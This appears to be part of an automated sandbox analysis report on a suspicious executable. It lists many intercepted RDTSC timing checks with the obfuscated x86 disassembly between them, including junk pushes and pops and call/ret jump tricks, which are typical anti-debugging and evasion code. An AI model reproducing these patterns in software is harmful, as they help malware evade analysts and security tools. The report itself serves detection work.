Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AA6A31 second address: AA6A36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AA6A36 second address: AA6A5F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD185A97D0Ch 0x00000008 jmp 00007FD185A97D14h 0x0000000d popad 0x0000000e push eax 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A8E2D3 second address: A8E2F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edi 0x00000007 jmp 00007FD184FDBE87h 0x0000000c popad 0x0000000d push edx 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A8E2F6 second address: A8E2FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AA5A04 second address: AA5A0B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AA5B6D second address: AA5B71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AA5B71 second address: AA5B94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FD184FDBE89h 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AA5B94 second address: AA5B98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AA5CC6 second address: AA5CCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AA5CCA second address: AA5CCE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AA5F6A second address: AA5F70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AA5F70 second address: AA5F92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FD185A97D19h 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AA60F6 second address: AA612A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FD184FDBE82h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FD184FDBE89h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AA612A second address: AA612E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AA612E second address: AA6148 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD184FDBE84h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AA84DA second address: AA855A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD185A97D0Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 4F93C697h 0x00000010 push 00000000h 0x00000012 push esi 0x00000013 call 00007FD185A97D08h 0x00000018 pop esi 0x00000019 mov dword ptr [esp+04h], esi 0x0000001d add dword ptr [esp+04h], 00000014h 0x00000025 inc esi 0x00000026 push esi 0x00000027 ret 0x00000028 pop esi 0x00000029 ret 0x0000002a mov di, B8A6h 0x0000002e push 00000003h 0x00000030 pushad 0x00000031 push esi 0x00000032 pop ecx 0x00000033 call 00007FD185A97D0Dh 0x00000038 call 00007FD185A97D0Bh 0x0000003d pop ebx 0x0000003e pop ecx 0x0000003f popad 0x00000040 mov dword ptr [ebp+122D1BA0h], eax 0x00000046 push 00000000h 0x00000048 jnp 00007FD185A97D0Ch 0x0000004e push 00000003h 0x00000050 mov dword ptr [ebp+122D2385h], ebx 0x00000056 push A8362947h 0x0000005b pushad 0x0000005c push eax 0x0000005d push edx 0x0000005e push ebx 0x0000005f pop ebx 0x00000060 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AA855A second address: AA855E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AA8680 second address: AA869F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FD185A97D06h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FD185A97D12h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AA869F second address: AA8708 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b jmp 00007FD184FDBE84h 0x00000010 pop eax 0x00000011 jno 00007FD184FDBE7Ch 0x00000017 push 00000003h 0x00000019 push 00000000h 0x0000001b mov ecx, 69734C6Eh 0x00000020 push 00000003h 0x00000022 add cl, 00000062h 0x00000025 call 00007FD184FDBE79h 0x0000002a js 00007FD184FDBE89h 0x00000030 push eax 0x00000031 push eax 0x00000032 push edx 0x00000033 pushad 0x00000034 pushad 0x00000035 popad 0x00000036 ja 00007FD184FDBE76h 0x0000003c popad 0x0000003d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AA8708 second address: AA870F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AA870F second address: AA8754 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b jc 00007FD184FDBE85h 0x00000011 jmp 00007FD184FDBE7Fh 0x00000016 mov eax, dword ptr [eax] 0x00000018 jg 00007FD184FDBE86h 0x0000001e mov dword ptr [esp+04h], eax 0x00000022 jno 00007FD184FDBE80h 0x00000028 pushad 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AA87B9 second address: AA886C instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD185A97D08h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007FD185A97D0Fh 0x00000010 nop 0x00000011 mov edi, dword ptr [ebp+122D29E2h] 0x00000017 push 00000000h 0x00000019 xor di, 904Ah 0x0000001e push 82FFFF19h 0x00000023 ja 00007FD185A97D0Eh 0x00000029 add dword ptr [esp], 7D000167h 0x00000030 and ecx, dword ptr [ebp+122D1E2Ch] 0x00000036 push 00000003h 0x00000038 push 00000000h 0x0000003a push ebx 0x0000003b call 00007FD185A97D08h 0x00000040 pop ebx 0x00000041 mov dword ptr [esp+04h], ebx 0x00000045 add dword ptr [esp+04h], 00000019h 0x0000004d inc ebx 0x0000004e push ebx 0x0000004f ret 0x00000050 pop ebx 0x00000051 ret 0x00000052 or dword ptr [ebp+122D1B6Fh], edi 0x00000058 mov dword ptr [ebp+122D39E0h], esi 0x0000005e push 00000000h 0x00000060 push 00000003h 0x00000062 mov ecx, dword ptr [ebp+122D2375h] 0x00000068 call 00007FD185A97D16h 0x0000006d mov esi, dword ptr [ebp+122D2B16h] 0x00000073 pop edx 0x00000074 call 00007FD185A97D09h 0x00000079 jl 00007FD185A97D14h 0x0000007f push eax 0x00000080 push edx 0x00000081 pushad 0x00000082 popad 0x00000083 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AA886C second address: AA88CD instructions: 0x00000000 rdtsc 0x00000002 jp 00007FD184FDBE76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007FD184FDBE83h 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 ja 00007FD184FDBE94h 0x0000001a mov eax, dword ptr [eax] 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FD184FDBE85h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AA88CD second address: AA88EA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD185A97D19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AA88EA second address: AA890F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007FD184FDBE85h 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push edx 0x00000014 pop edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AA890F second address: AA891F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD185A97D0Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: ACA07B second address: ACA081 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: ACA081 second address: ACA09F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push edi 0x00000006 jmp 00007FD185A97D14h 0x0000000b pop edi 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AC7FCA second address: AC7FD4 instructions: 0x00000000 rdtsc 0x00000002 js 00007FD184FDBE76h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AC7FD4 second address: AC7FDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AC7FDD second address: AC7FF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FD184FDBE76h 0x0000000a pop edx 0x0000000b popad 0x0000000c push esi 0x0000000d jnp 00007FD184FDBE7Ch 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AC82A1 second address: AC82C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jns 00007FD185A97D0Eh 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FD185A97D0Eh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AC82C6 second address: AC82CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AC82CA second address: AC82D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AC82D0 second address: AC82EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FD184FDBE81h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AC8572 second address: AC8576 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AC8576 second address: AC857A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AC8860 second address: AC886F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AC886F second address: AC8873 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AC8873 second address: AC8899 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FD185A97D06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FD185A97D0Eh 0x0000000f jmp 00007FD185A97D0Bh 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AC89BD second address: AC89F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD184FDBE84h 0x00000007 jmp 00007FD184FDBE82h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 jne 00007FD184FDBE76h 0x00000017 pop esi 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AC89F1 second address: AC89FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FD185A97D06h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AC89FD second address: AC8A03 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AC8F9B second address: AC8FA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AC8FA4 second address: AC8FA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AC9115 second address: AC9119 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AC9119 second address: AC9123 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AC9123 second address: AC9150 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD185A97D14h 0x00000007 jmp 00007FD185A97D15h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A9EDCC second address: A9EDD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A9EDD0 second address: A9EDEE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD185A97D14h 0x00000007 je 00007FD185A97D06h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A9EDEE second address: A9EDF4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A9EDF4 second address: A9EE1B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD185A97D0Bh 0x00000007 jmp 00007FD185A97D13h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ecx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AC9A78 second address: AC9A84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FD184FDBE76h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AC9A84 second address: AC9AA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD185A97D15h 0x00000009 popad 0x0000000a pop ecx 0x0000000b jl 00007FD185A97D0Eh 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: ACC919 second address: ACC91E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: ACDA32 second address: ACDA39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: ACDA39 second address: ACDA3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: ACDA3F second address: ACDA43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AD59FD second address: AD5A0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jno 00007FD184FDBE76h 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AD5A0D second address: AD5A11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AD5A11 second address: AD5A17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AD51D8 second address: AD5202 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD185A97D18h 0x00000009 popad 0x0000000a push ebx 0x0000000b jmp 00007FD185A97D0Bh 0x00000010 pop ebx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AD5522 second address: AD552D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FD184FDBE76h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AD552D second address: AD5533 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AD5533 second address: AD5537 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AD585E second address: AD586D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD185A97D0Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AD586D second address: AD5871 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AD61E9 second address: AD6233 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 add dword ptr [esp], 14F19C13h 0x0000000c push 00000000h 0x0000000e push edi 0x0000000f call 00007FD185A97D08h 0x00000014 pop edi 0x00000015 mov dword ptr [esp+04h], edi 0x00000019 add dword ptr [esp+04h], 00000015h 0x00000021 inc edi 0x00000022 push edi 0x00000023 ret 0x00000024 pop edi 0x00000025 ret 0x00000026 push D5E640D1h 0x0000002b push eax 0x0000002c push edx 0x0000002d push edx 0x0000002e jmp 00007FD185A97D18h 0x00000033 pop edx 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AD6560 second address: AD6573 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FD184FDBE78h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AD6573 second address: AD6579 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AD65EC second address: AD65F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AD65F0 second address: AD65F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AD67C1 second address: AD67C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AD6DED second address: AD6DF1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AD6DF1 second address: AD6DF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AD6DF7 second address: AD6DFC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AD6E9B second address: AD6E9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AD6FBB second address: AD6FBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AD6FBF second address: AD6FD0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD184FDBE7Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AD6FD0 second address: AD6FDA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007FD185A97D06h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AD70C5 second address: AD70E0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 jmp 00007FD184FDBE7Ah 0x0000000d pushad 0x0000000e jbe 00007FD184FDBE76h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AD73D6 second address: AD73FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jmp 00007FD185A97D18h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AD7874 second address: AD7878 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AD8076 second address: AD807A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AD7F1C second address: AD7F21 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AD93A2 second address: AD93A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD89B8 second address: AD89BE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADA6D2 second address: ADA6DC instructions: 0x00000000 rdtsc 0x00000002 jno 00007FD185A97D06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADA6DC second address: ADA6E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADBD67 second address: ADBD6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADCB09 second address: ADCB77 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FD184FDBE76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push ebp 0x00000011 call 00007FD184FDBE78h 0x00000016 pop ebp 0x00000017 mov dword ptr [esp+04h], ebp 0x0000001b add dword ptr [esp+04h], 00000016h 0x00000023 inc ebp 0x00000024 push ebp 0x00000025 ret 0x00000026 pop ebp 0x00000027 ret 0x00000028 push 00000000h 0x0000002a push 00000000h 0x0000002c push ecx 0x0000002d call 00007FD184FDBE78h 0x00000032 pop ecx 0x00000033 mov dword ptr [esp+04h], ecx 0x00000037 add dword ptr [esp+04h], 00000018h 0x0000003f inc ecx 0x00000040 push ecx 0x00000041 ret 0x00000042 pop ecx 0x00000043 ret 0x00000044 jnc 00007FD184FDBE7Ch 0x0000004a push 00000000h 0x0000004c xor dword ptr [ebp+122D1A96h], esi 0x00000052 add esi, 0E139BFEh 0x00000058 xchg eax, ebx 0x00000059 pushad 0x0000005a push eax 0x0000005b push edx 0x0000005c push eax 0x0000005d push edx 0x0000005e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADCB77 second address: ADCB7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
